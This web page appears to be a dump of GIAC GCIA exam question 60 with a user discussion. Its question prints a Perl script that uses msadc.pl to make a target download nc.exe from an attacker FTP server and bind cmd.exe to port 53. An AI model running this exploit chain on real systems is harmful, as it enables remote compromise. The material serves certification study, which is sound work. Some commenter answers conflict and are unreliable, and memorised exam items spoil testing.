Cyber Monday 2024! Hurry Up, Grab the Special Discount - Save 25% - Ends In 00:00:00 Coupon code: SAVE25
Welcome to Pass4Success

- Free Preparation Discussions
Mail Us support@pass4success.com
Location US
Mob_nav_barsMENU

GIAC Exam GCIA Topic 5 Question 60 Discussion

Actual exam question for GIAC's GCIA exam
Question #: 60
Topic #: 5
[All GCIA Questions]

Adam, a malicious hacker performs an exploit, which is given below:

#################################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#################################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h

$host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system

("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");

system("perl

msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get

hacked.

html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is

downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is

finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";

#system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

Show Suggested Answer Hide Answer
Suggested Answer: D

by Lynsey at Oct 20, 2024, 08:57 PM

Limited Time Offer

25%

Off

Get Premium GCIA Questions as Interactive Web-Based Practice Test or PDF

Contribute your Thoughts:

Submit Cancel
Cecil
1 months ago
Wow, this is some serious hacking stuff! I bet the answer is C, since the script is setting up an FTP server with write permissions. That would be a pretty nasty way to gain access to the target system.
upvoted 0 times
Charlene
3 days ago
I agree, setting up an FTP server with write permissions could be very dangerous for the target system.
upvoted 0 times
...
Dalene
23 days ago
Yeah, that would definitely be a sneaky way to gain access to the target system.
upvoted 0 times
...
Eden
25 days ago
I think you're right, the script does seem to be setting up an FTP server with write permissions.
upvoted 0 times
...
...
Aron
1 months ago
I'm not a fan of this kind of malicious code, but I have to admit it's pretty clever. The answer is definitely not A or B, so I'm going with D. Gotta love that 'no username or password' part!
upvoted 0 times
...
Emerson
1 months ago
Hmm, I'm not sure I'm comfortable analyzing this kind of exploit. But I guess the correct answer is D, since it opens up a telnet listener that doesn't require any authentication.
upvoted 0 times
...
Meaghan
1 months ago
This exploit is basically downloading a malicious file (nc.exe) from an FTP server and then executing it on the target system. The expected result is to open up a reverse shell on the target, giving the attacker remote access.
upvoted 0 times
Theodora
9 days ago
D) Opens up a telnet listener that requires no username or password
upvoted 0 times
...
Coleen
16 days ago
C) Creates an FTP server with write permissions enabled
upvoted 0 times
...
Ashlee
18 days ago
B) Creates a share called sasfile on the target system
upvoted 0 times
...
...
Elfriede
1 months ago
I disagree, I believe the expected result is B) Creates a share called 'sasfile' on the target system because of the 'echo open $your >sasfile' command in the exploit.
upvoted 0 times
...
Darrel
2 months ago
I think the expected result is D) Opens up a telnet listener that requires no username or password.
upvoted 0 times
...

Save Cancel